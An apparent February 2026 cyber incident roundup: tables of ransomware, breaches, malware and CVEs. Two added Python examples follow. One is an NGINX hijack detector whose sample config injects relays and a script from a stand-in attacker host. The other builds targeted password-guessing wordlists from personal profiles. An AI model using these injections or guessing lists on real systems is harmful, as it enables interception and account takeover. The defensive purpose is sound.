February 2026 delivered another stark reminder that no sector is immune from cyber disruption. From financial platforms like Betterment and PayPal, to critical financial infrastructure such as France’s National Bank Account Registry (FICOBA), attackers continued to exploit credential weaknesses, third-party dependencies and identity-driven vulnerabilities.
Meanwhile, incidents impacting Iron Mountain, Panera Bread, BridgePay, SmarterTools, Step Finance, Advantest Corporation and even nation-state targets demonstrated the expanding surface area of modern digital ecosystems.
This month’s compilation highlights a troubling pattern: the growing dominance of identity compromise, data exposure without extortion, and attacks that ripple far beyond a single organisation. Whether it was financial data, payment infrastructure, enterprise systems or national registries, the common thread was operational impact and trust erosion. The line between commercial breach and systemic risk continues to blur, and response speed now defines resilience.
At Cyber Management Alliance, we help organisations prepare for exactly these scenarios. Through our NCSC-Assured Cyber Incident Planning & Response training, expert-led cyber tabletop exercises, and bespoke incident response playbook workshops, we equip teams to respond decisively and recover with confidence. Because in today’s threat landscape, agility in response is not optional. It is your competitive advantage.
| Date | Victim | Summary | Threat Actor | Business Impact | Source Link |
|---|---|---|---|---|---|
| February 04, 2026 | Organisations running vulnerable VMware ESXi environments | CISA: VMware ESXi flaw now exploited in ransomware attacks | Unknown | Ransomware operators actively exploited a critical VMware ESXi VM-escape vulnerability to gain hypervisor-level access to virtualised environments, raising the risk of enterprise-wide compromise and data exposure. | |
| February 05, 2026 | Sapienza University | One of Europe’s largest universities knocked offline for days after cyber attack | Femwar02 (linked to use of BabLock/Rorschach malware) | The attack forced Sapienza University of Rome to shut down major IT systems for several days, disrupting online services and limiting communications while systems were restored from unaffected backups. | |
| February 05, 2026 | Conpet S.A. | Romanian oil pipeline operator Conpet discloses cyber attack | Qilin ransomware | The ransomware attack disrupted Conpet’s corporate IT systems and website, and the group claimed to have stolen large volumes of internal data; core oil transport operations continued to run normally. | Bleeping Computer |
| February 07, 2026 | BridgePay | Payments platform BridgePay confirms ransomware attack behind outage | Unknown | The ransomware attack took BridgePay’s payment-processing infrastructure offline nationwide, forcing many merchants to fall back to cash-only transactions while services were restored. | Bleeping Computer |
| February 09, 2026 | SmarterTools | Hackers breach SmarterTools network using flaw in its own software | Warlock ransomware | SmarterTools was breached after attackers exploited an unpatched instance of its own SmarterMail software, compromising internal systems and multiple Windows servers; customer data and core business services were not affected. | Bleeping Computer |
| February 20, 2026 | University of Mississippi Medical Center | University of Mississippi Medical Center closes clinics after ransomware attack | Unknown | A ransomware attack crippled UMMC’s IT systems, including its electronic health records, forcing statewide clinic closures, cancelled surgeries and appointments, and a fallback to manual processes for patient care. | Bleeping Computer |
| February 20, 2026 | Organisations using BeyondTrust remote access and support products | CISA: BeyondTrust RCE flaw now exploited in ransomware attacks | Unknown | Attackers actively exploited a critical BeyondTrust remote-access vulnerability to gain unauthorised control, deploy malicious tooling and carry out ransomware intrusions against affected organisations. | Bleeping Computer |
| February 20, 2026 | Advantest Corporation | Advantest Corporation hit by ransomware attack | Unknown | The company detected a ransomware intrusion in its internal IT network, isolated affected systems and opened an investigation to contain the incident and assess operational impact while keeping unaffected environments running. | Bleeping Computer |
| February 21, 2026 | UAE national networks (not named) | UAE foils cyber attacks, state news agency says | Unknown | The United Arab Emirates said it blocked organised cyber attacks that attempted to infiltrate national networks, deploy ransomware and run widespread phishing campaigns against government and vital digital infrastructure. | Reuters |
| February 24, 2026 | Marquis Health | Marquis blames ransomware breach on SonicWall cloud backup hack | Unknown | Marquis Health attributed a ransomware breach to the compromise of its SonicWall cloud backups, which gave attackers the foothold they used to encrypt data and disrupt operations at its facilities; the ransomware group was not publicly confirmed, and the incident exposed the risk carried by third-party backup services. | Bleeping Computer |

| Date | Victim | Summary | Threat Actor | Business Impact | Source Link |
|---|---|---|---|---|---|
| February 01, 2026 | NationStates | NationStates confirms data breach; shuts down game site | Unknown | Unauthorised server access exposed user account data such as email addresses, password hashes and login details, forcing NationStates to take its website offline and rebuild its systems while the investigation and remediation ran. | Bleeping Computer |
| February 01, 2026 | Panera Bread | Panera Bread breach impacts 5.1 million accounts, not 14 million customers | ShinyHunters | The incident exposed personal contact information for about 5.1 million user accounts, and the stolen data was leaked publicly after an extortion attempt failed, leaving affected individuals exposed to phishing and identity misuse. | |
| February 03, 2026 | Coinbase | Coinbase confirms insider breach linked to leaked support tool screenshots | Unknown | Coinbase confirmed that insiders were manipulated or bribed into misusing internal support tools, allowing attackers to access and leak limited customer account data and screenshots; the incident is a social-engineering failure rather than a direct compromise of Coinbase systems. | Bleeping Computer |
| February 05, 2026 | Substack | Substack data breach notification | Unknown | Substack disclosed that unauthorised access to its systems exposed users’ contact details, such as email addresses and phone numbers, prompting notifications and phishing warnings; sensitive financial data was not compromised. | |
| February 05, 2026 | Betterment | Fintech firm Betterment confirms data breach after hackers send fake crypto scam notification to users | Unknown | The incident exposed customer contact details that were then used to send convincing fake crypto-investment messages, raising phishing and identity-theft risks even though account passwords and financial systems were not compromised. | |
| February 06, 2026 | Flickr | Flickr discloses potential data breach exposing users’ names, emails etc. | Unknown | Flickr alerted users that a security issue at a third-party email service provider may have exposed personal details such as names, email addresses, IP data and account activity; no passwords or payment information were compromised. | Bleeping Computer |
| February 10, 2026 | Volvo Group North America (indirectly, as a customer of Conduent) | Volvo Group North America customer data exposed in Conduent hack | Unknown | A third-party breach at Conduent exposed sensitive personal information of nearly 17,000 Volvo Group North America customers and employees after attackers accessed and stole data from the service provider’s systems. | Bleeping Computer |
| February 11, 2026 | Users of a compromised Outlook add-in on the Microsoft Store | Microsoft Store Outlook add-in hijacked to steal 4,000 Microsoft accounts | Unknown | Attackers compromised a legitimate Outlook add-in listed on the Microsoft Store and used it to harvest credentials, resulting in the theft of roughly 4,000 Microsoft accounts. | Bleeping Computer |
| February 12, 2026 | Odido | Odido data breach exposes personal information of 6.2 million customers | Unknown | Unauthorised access to a customer contact system exposed the personal information of about 6.2 million Odido customers; core telecom services continued to run normally. | Bleeping Computer |
| February 18, 2026 | Figure Technology Solutions | Data breach at fintech giant Figure affects close to a million customers | ShinyHunters | Hackers breached Figure Technology Solutions and stole files exposing sensitive personal data of nearly one million customers, including contact details and dates of birth. | TechCrunch |
| February 19, 2026 | France’s National Bank Account Registry (FICOBA) | Attackers breach France national bank account database | Unknown | Attackers gained unauthorised access to France’s national bank account registry and exposed sensitive records linked to roughly 1.2 million accounts, raising fraud and phishing risks even though no transactions were carried out. | |
| February 20, 2026 | PayPal | PayPal discloses data breach exposing users’ personal information | None (software error, not an attack) | A software error in PayPal’s loan application exposed sensitive personal data of a limited number of users for several months, creating privacy risk even though the company said its systems were not hacked. | Bleeping Computer |
| February 24, 2026 | CarGurus | ShinyHunters cyber attack on CarGurus impacts 12.4 million users | ShinyHunters | An attack on the online auto marketplace CarGurus exposed account records of about 12.4 million users, forcing the company to reset passwords and notify affected customers once the breach was discovered. | |
| February 24, 2026 | Wynn Resorts | Wynn Resorts says hackers acquired employee data | ShinyHunters | Wynn Resorts confirmed that hackers stole employee information from its systems and opened an investigation into the unauthorised access to staff data and the accompanying ransom demand. | Reuters |
| February 25, 2026 | UFP Technologies | Medical device maker reports data theft hack to SEC | Unknown | UFP Technologies reported that a cyber attack discovered on February 14 resulted in company data being stolen or destroyed, obliging the medical device maker to disclose the incident to the U.S. Securities and Exchange Commission. | |

| Date | Victim | Summary | Threat Actor | Business Impact | Source Link |
|---|---|---|---|---|---|
| February 02, 2026 | Notepad++ | Notepad++ says Chinese government hackers hijacked its software updates for months | Lotus Blossom (China-linked state-sponsored group) | The attack quietly abused Notepad++’s update mechanism for months in 2025 to deliver malicious builds of the programme to selected targets, giving the attackers hands-on access to affected machines and turning a trusted update channel into a supply-chain intrusion vector. | TechCrunch |
| February 02, 2026 | OpenVSX extensions and their macOS users | New GlassWorm attack targets macOS via compromised OpenVSX extensions | GlassWorm (campaign name; operator not identified) | The campaign compromised trusted OpenVSX development extensions to silently infect macOS users, letting attackers steal passwords, developer credentials and cryptocurrency wallet data and gain remote access to affected machines through a software supply-chain breach. | Bleeping Computer |
| February 03, 2026 | Iron Mountain | Iron Mountain hackers claim 1.4 TB theft; company says impact limited | Everest (extortion group) | Iron Mountain investigated the group’s claim to have stolen 1.4 TB of company data and said the incident was contained and limited in scope, with no evidence of widespread compromise of core customer systems. | |
| February 03, 2026 | Step Finance | Step Finance says compromised execs’ devices led to $40M crypto theft | Unknown | Attackers reportedly compromised executives’ devices to obtain privileged access and drain roughly $40 million in cryptocurrency from treasury wallets, forcing operational pauses and emergency security actions. | Bleeping Computer |
| February 04, 2026 | Organisations running misconfigured or exposed NGINX web servers | Hackers compromise NGINX servers to redirect user traffic | Unknown | Attackers compromised NGINX servers and quietly altered configuration files to reroute legitimate website traffic through their own infrastructure, enabling interception of sensitive data and manipulation of user sessions without visibly disrupting the sites. | |
| February 09, 2026 | European Union and Dutch government bodies (including agencies using the affected Ivanti systems) | EU, Dutch government announce hacks exploiting Ivanti zero-days | Unknown | Hackers exploited critical Ivanti zero-day vulnerabilities to gain unauthorised access to systems used by EU and Dutch government bodies, raising concerns about exposure of sensitive institutional data and prompting urgent mitigation. | The Record |
| February 09, 2026 | Singapore’s four major telecom operators: Singtel, StarHub, M1 and Simba Telecom | Chinese cyberspies breach Singapore’s four largest telcos | UNC3886 (China-nexus cyber-espionage group) | Chinese state-linked hackers infiltrated parts of Singapore’s major telecom networks in a covert espionage campaign, gaining limited access and extracting some technical data without disrupting services or exposing customer information. | Bleeping Computer |
| February 23, 2026 | FortiGate firewalls | Russian hackers used generative AI to compromise FortiGate firewalls, researchers say | Unknown (Russian-speaking actor) | A Russian-speaking threat actor used generative-AI-assisted automation to exploit weakly secured management interfaces and credentials, compromising hundreds of Fortinet FortiGate devices worldwide and exposing their owners to unauthorised access and potential data theft. | The Record |
| February 24, 2026 | Freight and logistics firms: DAT Truckstop, TIMOCOM, Teleroute, Penske Logistics, Girteka and Electronic Funds Source (EFS) | Phishing campaign targets freight and logistics orgs in the US and Europe | TA2541 | A widespread phishing campaign targeted freight and logistics companies across the United States and Europe with fake login pages and malicious links to steal credentials and gain unauthorised access; researchers attributed the activity to TA2541, a long-running actor known for targeting the aviation, transportation and logistics sectors. | Bleeping Computer |
| February 28, 2026 | Iran’s critical infrastructure, internet connectivity and communication systems | Israel plunges Iran into darkness with the largest cyber attack in history | Israeli cyber operations units and allied intelligence forces (as reported in the context of Operation Roar of the Lion) | Israeli cyber forces reportedly executed a large-scale cyber attack that disrupted Iran’s critical infrastructure, internet connectivity and communication systems, leaving government networks in a digital blackout alongside coordinated physical military strikes. | |
| February 28, 2026 | Government systems in Mexico | Hackers weaponise Claude Code in Mexican government cyber attack | Unknown | Government systems in Mexico were breached by attackers who abused Anthropic’s legitimate Claude Code tool to help orchestrate and automate the intrusion, causing data exposure and operational disruption. | Security Week |
| February 28, 2026 | Iranian prayer app Zekr | Hacked prayer app sends surrender messages to Iranians amid Israeli strikes | Unknown | The popular Iranian prayer app Zekr was compromised and used to push pre-written surrender and propaganda messages to users during Israeli strikes, disrupting its normal religious functions and eroding trust among its millions of users. | |

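The NGINX entry above describes attackers rerouting traffic by editing configuration files. The following is an added example, not code from the cited reporting or from the NGINX project: it scans a configuration for the directives such tampering relies on (upstream `server` members, `proxy_pass`, `return`, `rewrite`, `sub_filter`) and flags any that point to a host outside an allowlist. The sample configuration, the allowlisted hosts and the attacker-controlled hostnames are all constructed for the illustration.

```python
"""Flag NGINX directives that hand traffic to hosts outside an allowlist.

Added example for the NGINX traffic-hijacking entry above; it is not code
from the cited reporting or from the NGINX project. The config text, the
allowlist and the attacker-controlled hosts below are constructed.
"""
import re
from urllib.parse import urlparse

# Directives an intruder edits to reroute traffic or inject content.
REDIRECT_DIRECTIVES = ("proxy_pass", "return", "rewrite", "sub_filter")

URL_RE = re.compile(r"https?://[^\s;'\"]+")
NGINX_VAR_RE = re.compile(r"\$\w+")   # $request_uri, $host, ...


def scan_nginx_config(text, allowed_hosts):
    """Return (line_no, directive, host) for each upstream member or
    redirect-capable directive whose target host is not in allowed_hosts.

    Relative targets (named upstream blocks, unix: sockets, bare paths)
    carry no external host and are skipped. Comment stripping is line-based,
    so a '#' inside a quoted argument would truncate that line; use a full
    parser (e.g. nginx's crossplane) for production audits.
    """
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        directive = line.split(None, 1)[0]
        if directive == "server":            # upstream member, not a server { block
            args = line.rstrip(";").split()
            if len(args) >= 2 and args[1] != "{":
                host = args[1].split(":")[0].lower()   # host[:port], IPv4/hostname form
                if host != "unix" and host not in allowed:
                    findings.append((line_no, "server", host))
            continue
        if directive not in REDIRECT_DIRECTIVES:
            continue
        for url in URL_RE.findall(line):
            # drop nginx variables so urlparse sees only the literal host
            host = (urlparse(NGINX_VAR_RE.sub("", url)).hostname or "").lower()
            if host and host not in allowed:
                findings.append((line_no, directive, host))
    return findings


# Constructed config: a legitimate site with three injected changes.
SAMPLE_CONFIG = """\
upstream backend {
    server 10.0.0.5:8080;
    server 198.51.100.7:8080;   # injected: attacker-controlled upstream member
}

server {
    listen 443 ssl;
    server_name shop.example.com;

    location / {
        proxy_pass http://backend;
    }
    location /static/ {
        root /var/www/shop;
    }
    # injected: relays the login flow through the intruder's host
    location /login {
        proxy_pass https://cdn-metrics.example.net/relay;
    }
    # injected: bounces a legacy path to a look-alike domain
    location /old {
        return 302 https://shop-example.com$request_uri;
    }
    location /app {
        proxy_pass http://backend;
        sub_filter '</body>' '<script src="https://cdn-metrics.example.net/t.js"></script></body>';
    }
}
"""

# Hosts the operator expects to see: the site itself, the named upstream
# block and its one legitimate member.
ALLOWED_HOSTS = {"shop.example.com", "backend", "10.0.0.5"}


def audit_sample():
    """Run the scan over the constructed config."""
    return scan_nginx_config(SAMPLE_CONFIG, ALLOWED_HOSTS)


if __name__ == "__main__":
    for line_no, directive, host in audit_sample():
        print(f"line {line_no}: {directive} -> {host} (not in allowlist)")
```

Run against a real server, the scan should be pointed at every file reachable through `include` and paired with a hash of the known-good configuration, since an intruder who can edit `nginx.conf` can also add an innocuous-looking include. The allowlist is the operator's own list of legitimate upstreams; anything the scan flags that is not on it deserves a look at file modification times and the shell history of whoever could write to the directory.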
| New Ransomware / Malware | Summary |
|---|---|
| GridTide malware | A previously unseen espionage backdoor called GridTide was discovered in use by a China-linked threat actor (UNC2814) in a campaign targeting government and telecom networks around the world. |
| Dohdoor malware | Researchers flagged a new backdoor named Dohdoor, used by a threat actor tracked as UAT-10027, which uses DNS-over-HTTPS for command and control in cloud environments. |
| Ndm448 ransomware | Threat intelligence monitoring identified Ndm448 in underground forums as a newly observed ransomware strain targeting Windows machines. |
| Ransoomed ransomware | Another newly observed strain, Ransoomed, was picked up by analysts during routine monitoring, a sign of continued churn in the ransomware landscape. |
| PromptSpy malware | Researchers identified PromptSpy, an Android malware that uses generative AI to persist, adapt to its environment and enable remote control via VNC, an early example of an AI-assisted mobile threat. |

Source for the above table: Bleeping Computer

| Date | New Flaws/Fixes | Summary |
|---|---|---|
| February 02, 2026 | CVE-2026-21509 | Russian state-linked hackers quickly took advantage of a newly fixed Microsoft Office weakness, sending weaponised documents that installed malware on unpatched systems and let them infiltrate and maintain access to targeted organisations. |
| February 03, 2026 | CVE-2025-11953 | Attackers exploited a critical flaw in React Native’s Metro development server, sending crafted requests that executed code and deployed malware on exposed developer machines, turning unsecured dev environments into an entry point for broader compromise. |
| February 03, 2026 | CVE-2025-40551 | CISA warned that attackers were actively exploiting a critical remote code execution flaw in SolarWinds Web Help Desk and urged organisations to patch immediately after adding it to the Known Exploited Vulnerabilities catalogue. |
| February 04, 2026 | CVE-2025-68613 | Researchers disclosed multiple critical vulnerabilities in the n8n workflow automation platform that could let attackers escape the intended execution environment and seize full control of the underlying server; public proof-of-concept exploits raised the risk of real-world compromise. |
| February 04, 2026 | CVE-2021-39935 | CISA warned that attackers were actively exploiting a five-year-old GitLab vulnerability, urging organisations to patch urgently to prevent unauthorised access and follow-on compromise. |
| February 04, 2026 | CVE-2025-8088 | The newly identified Amaranth Dragon cyber-espionage group exploited a WinRAR vulnerability to infiltrate government and law-enforcement organisations, deploying stealthy malware and remote-access tools to maintain persistence and gather intelligence. |
| February 09, 2026 | CVE-2025-40551 | Attackers exploited critical SolarWinds Web Help Desk flaws to gain remote code execution and covertly deployed legitimate tools such as Velociraptor to maintain access, move laterally and evade detection inside targeted networks. |
| February 11, 2026 | CVE-2026-20841 | A vulnerability in Windows 11 Notepad allowed specially crafted Markdown links to silently execute files, potentially enabling remote code execution; the issue was reported to and addressed by Microsoft. |
| February 17, 2026 | CVE-2026-22769 | Chinese state-backed hackers had been exploiting a critical zero-day flaw in Dell RecoverPoint for Virtual Machines since mid-2024 to gain unauthorised access and maintain persistent control inside targeted networks. |
| February 17, 2026 | CVE-2025-65715, CVE-2025-65716, CVE-2025-65717 | Researchers discovered multiple high- to critical-severity flaws in widely used Visual Studio Code extensions that could have allowed attackers to steal local files and achieve remote code execution, putting millions of developer environments at risk. |
| February 18, 2026 | CVE-2026-24423, CVE-2026-23760 | Threat actors rapidly weaponised newly disclosed SmarterMail vulnerabilities, sharing exploits, tools and stolen admin credentials on Telegram within days, enabling real-world intrusions and paving the way for ransomware deployment. |
| February 18, 2026 | CVE-2026-1670 | Researchers reported that multiple Honeywell CCTV models contained a critical authentication bypass that could have allowed unauthenticated attackers to take over accounts and access camera feeds. |
| February 19, 2026 | CVE-2026-21486 | A vulnerability in Grandstream VoIP phones could have allowed attackers to silently eavesdrop on calls and reach internal device interfaces, a serious risk to privacy and communications security until it was disclosed. |
| February 19, 2026 | CVE-2025-7702 | A critical remote code execution vulnerability was discovered in more than a dozen Zyxel router models that could let attackers execute code on unpatched devices, putting home and business networks at risk. |

Source for the above table: Bleeping Computer, Recorded Future

| News Type | Summary |
|---|---|
| Advisory | Apple’s new “Limit Precise Location” feature reduces the risk of unwanted carrier-based tracking by letting cellular networks see only a user’s approximate location rather than an exact address, strengthening privacy safeguards. |
| Warning | Attackers continue to exploit poorly secured, internet-exposed MongoDB databases, automatically wiping or stealing data and demanding small Bitcoin ransoms; simple misconfigurations still leave many organisations open to opportunistic extortion. |
| Warning | A significant global wave of high-yield investment programme scams emerged, using convincing websites and aggressive online promotion to promise extraordinary profits while running Ponzi-style operations that vanished once enough victim funds had been collected. |
| Report | The UK’s data-protection regulator opened an investigation into X to examine whether its Grok AI system improperly used personal data and failed to prevent the creation and spread of non-consensual sexual deepfakes, raising privacy and online-safety compliance concerns. |
| Report | Organisations have begun treating AI agents as non-human identities and building an identity-centric security control plane so CISOs can govern, monitor and limit autonomous AI access like any other privileged account. |
| Report | The Zendesk spam campaign resurfaced, targeting users with a surge of fake “activate account” emails that impersonated legitimate notifications to lure recipients into phishing content and cause confusion across affected organisations. |
| Warning | Attackers actively exploited a five-year-old GitLab vulnerability against unpatched systems, prompting CISA to warn organisations to urgently secure exposed instances. |
| Report | Organisations increasingly rely on non-human identities (service accounts, APIs and automation tools), which expand the attack surface and create significant blind spots if not properly governed and monitored. |
| Report | Ransomware actors abused legitimate ISPsystem VMmanager virtual machines to quietly host and deliver malicious payloads, blending their infrastructure with normal environments to evade detection and complicate takedowns. |
| Report | Attackers abused legitimate Zendesk features to generate huge volumes of fake support emails that bypassed spam filters and flooded inboxes, causing disruption and confusion but delivering no malware. |
| Warning | CISA warned that a critical SmarterMail vulnerability was being actively exploited by ransomware actors to gain remote code execution on vulnerable email servers, prompting urgent patching and mitigation. |
| Warning | German authorities warned that attackers used sophisticated phishing and social engineering to hijack the Signal accounts of senior politicians, military personnel and journalists and gain access to sensitive communications. |
| Warning | BeyondTrust warned that a critical vulnerability in its Remote Support and Privileged Remote Access products could let unauthenticated attackers run malicious code, leading to system compromise, data theft or service disruption if organisations failed to patch quickly. |
| Report | Microsoft acknowledged that a filtering issue in Exchange Online mistakenly flagged many legitimate emails as phishing, quarantining them and disrupting business communications until mitigations were applied. |
| Report | Attackers built highly customised password-guessing lists from publicly available information and contextual clues about their targets, such as language, demographics or leaked data, making traditional guessing attacks far more effective even without AI. |
| Report | South Korean regulators fined the companies involved a combined $25 million after investigations found that inadequate security controls led to unauthorised access and exposure of millions of customers’ personal data. |
| Report | A security analysis found that a single coordinated threat actor was responsible for about 83% of recent exploitation attempts against Ivanti remote code execution vulnerabilities, pointing to a focused, persistent campaign rather than widespread unrelated attacks. |
| Report | Texas filed a lawsuit against TP-Link alleging the company misled consumers about product security while its devices were linked to potential exploitation by Chinese state-sponsored hackers. |
| Report | The FBI reported that a surge in ATM “jackpotting” malware attacks in 2025 forced machines to dispense cash, causing losses exceeding $20 million and highlighting a growing threat to financial institutions. |
| Report | Chinese state-linked cyber spies infiltrated dozens of telecommunications companies and government agencies around the world to steal sensitive data and gain long-term access to critical networks in a sustained espionage campaign. |
| Report | U.S. authorities sanctioned a Russian-linked exploit broker who bought and sold zero-day exploits to criminal and state-linked hackers, aiming to disrupt global cybercrime operations and deter abuse of critical exploits. |

Sources: Bleeping Computer and Infosecurity Magazine
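The report above on contextual password-guessing lists is easiest to appreciate by building one. The following is an added example, not the tooling the report describes: from the kind of public facts about a person that an attacker scrapes (names, employer, a pet, a team, years that matter to them), it generates the candidate list a targeted attack would try, in the order a patient attacker would try them, and reports whether a given password lands in that list and at what rank. It is meant for auditing your own users or policy; in a real audit you would compare password hashes rather than plaintext. The target profile, the years and the mutation rules are constructed assumptions.

```python
"""Measure how guessable a password is against a target-tailored wordlist.

Added example for the report above on contextual password-guessing; it is
not the tooling that report describes. The target profile, the years and
the mutation rules below are constructed for the illustration.
"""
from itertools import product

# Substitutions that every targeted list includes by default.
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "$"})
SUFFIXES = ("", "!", "1", "123", "!1", "2026")

# Constructed profile of the kind assembled from social media and a
# company website; nothing here refers to a real person.
SAMPLE_TARGET = {
    "name": "Maria Kowalski",
    "employer": "Acme Freight",
    "pet": "Biscuit",
    "team": "Tigers",
    "city": "Rotterdam",
}
SAMPLE_YEARS = (1988, 2024)   # e.g. birth year and the year of a visible life event


def base_tokens(facts):
    """Bare words drawn from the profile, lower-cased, in profile order, no repeats."""
    tokens = []
    for value in facts.values():
        for word in str(value).split():
            w = word.lower()
            if len(w) >= 3 and w not in tokens:
                tokens.append(w)
    return tokens


def mutate(word):
    """Case and leet variants of one token, in a deterministic order."""
    variants = {word, word.capitalize(), word.upper(),
                word.translate(LEET), word.capitalize().translate(LEET)}
    return sorted(variants)


def targeted_candidates(facts, years=()):
    """Ordered candidate list: cheapest guesses first.

    Tier 1: one token plus a common suffix.
    Tier 2: one token plus a personally meaningful year (full or two-digit).
    Tier 3: two profile tokens joined directly, with '_' or in CamelCase.
    """
    tokens = base_tokens(facts)
    seen, out = set(), []

    def add(candidate):
        if candidate not in seen:
            seen.add(candidate)
            out.append(candidate)

    for t in tokens:
        for v in mutate(t):
            for s in SUFFIXES:
                add(v + s)
    for t in tokens:
        for y in years:
            for v in mutate(t):
                add(f"{v}{y}")
                add(f"{v}@{y}")
                add(f"{v}{str(y)[-2:]}")
    for a, b in product(tokens, repeat=2):
        if a != b:
            for va in mutate(a):
                add(va + b)
                add(va + "_" + b)
                add(va + b.capitalize())
    return out


def guessability(password, facts, years=()):
    """Return (rank, list_size); rank is the 1-based position of the password
    in the targeted list, or None if it is not derivable from the profile."""
    candidates = targeted_candidates(facts, years)
    if password in candidates:
        return candidates.index(password) + 1, len(candidates)
    return None, len(candidates)


if __name__ == "__main__":
    for pw in ("M4r14!", "Biscuit2024", "tigers_rotterdam", "correct horse battery staple"):
        rank, size = guessability(pw, SAMPLE_TARGET, SAMPLE_YEARS)
        print(f"{pw!r}: rank {rank} of {size}")
```

The point the report makes is visible in the numbers: the list is only about a thousand entries, small enough to try against a login endpoint with a lockout policy over a week, yet it catches every password built from the profile. A rank in the first few hundred is a password the attacker reaches before a rate limiter matters; a `None` result says only that this profile does not derive it, not that it is strong.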